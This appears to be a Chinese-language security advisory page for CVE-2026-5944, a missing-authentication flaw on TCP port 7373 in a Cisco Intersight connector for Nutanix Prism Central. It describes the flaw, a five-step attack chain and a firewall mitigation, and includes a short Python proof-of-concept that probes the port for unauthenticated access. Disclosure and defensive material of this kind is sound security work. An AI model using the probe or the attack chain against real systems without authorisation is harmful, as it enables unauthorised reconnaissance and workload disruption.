CVE-2026-5944 CVSS 8.2 高危

CVE-2026-5944 Cisco Intersight访问控制漏洞

披露日期: 2026-04-28

来源: 2ffdacf6-8681-47df-b023-4f11abd61c1d

漏洞信息

漏洞编号

CVE-2026-5944

漏洞类型

访问控制失效

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Cisco Intersight Device Connector for Nutanix Prism Central

漏洞概述

Cisco Intersight Device Connector for Nutanix Prism Central组件存在访问控制缺陷。该组件在TCP 7373端口暴露API透传接口且未部署身份验证。网络内的未经认证攻击者可利用此漏洞发送特制请求，枚举集群元数据（如虚拟机信息、配置详情）及调用维护工作流。尽管无法持久修改配置或窃取凭证，但利用此漏洞可能导致工作负载中断，严重影响系统可用性。

技术细节

该漏洞的核心成因在于Cisco Intersight Device Connector组件针对Nutanix Prism Central的集成过程中，未能对特定的API透传端点实施有效的身份验证机制。该服务默认监听TCP 7373端口，用于在本地环境与Cisco Intersight云平台之间传输数据。由于配置疏忽，该端口在部署环境的网络内直接暴露，且未设置任何访问凭据检查。攻击者无需任何用户交互或特权账号，仅需网络连通性即可访问该端点。在攻击利用层面，攻击者可以通过发送精心构造的HTTP请求至该未授权端点。利用API透传机制，攻击者能够向后端Nutanix Prism Central系统发送指令。这允许攻击者枚举敏感的集群元数据，如虚拟机列表、存储配置及网络拓扑等。此外，尽管大部分操作为只读，但特定的维护工作流接口亦可被触发。攻击者通过调用这些接口，可能导致执行非预期的维护任务，进而干扰正常的业务负载运行，最终导致服务中断或可用性下降。

攻击链分析

STEP 1

侦察

攻击者扫描目标网络，寻找开放TCP 7373端口的Cisco Intersight Device Connector服务。

STEP 2

漏洞利用

攻击者无需认证，直接向7373端口的API端点发送特制的HTTP请求。

STEP 3

信息枚举

通过API透传机制，读取集群元数据，获取虚拟机信息及配置详情。

STEP 4

执行操作

调用暴露的维护工作流接口，执行非预期的集群维护任务。

STEP 5

影响实现

导致活跃工作负载中断，造成目标环境服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_cve_2026_5944(target_ip):
    """
    PoC for CVE-2026-5944: Unauthenticated access to API passthrough on port 7373.
    """
    target_url = f"http://{target_ip}:7373/"  # Default vulnerable port
    headers = {
        "User-Agent": "CVE-2026-5944-Scanner",
        "Accept": "application/json"
    }

    try:
        # Send a request without authentication to enumerate metadata
        response = requests.get(target_url, headers=headers, timeout=10)

        if response.status_code == 200:
            print(f"[+] Target {target_ip} is vulnerable!")
            print(f"[+] Response received: {response.text[:200]}")
        elif response.status_code == 401 or response.status_code == 403:
            print(f"[-] Target {target_ip} requires authentication. Not vulnerable.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")

    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python3 poc.py <target_ip>")
    else:
        check_cve_2026_5944(sys.argv[1])

影响范围

Cisco Intersight Device Connector for Nutanix Prism Central (具体受影响版本请参考Nutanix Security Advisory 0046)

防御指南

临时缓解措施

如果无法立即安装补丁，建议在防火墙或网络ACL中阻断对TCP 7373端口的入站访问，确保只有受信任的管理节点能够与Device Connector通信，从而减少攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表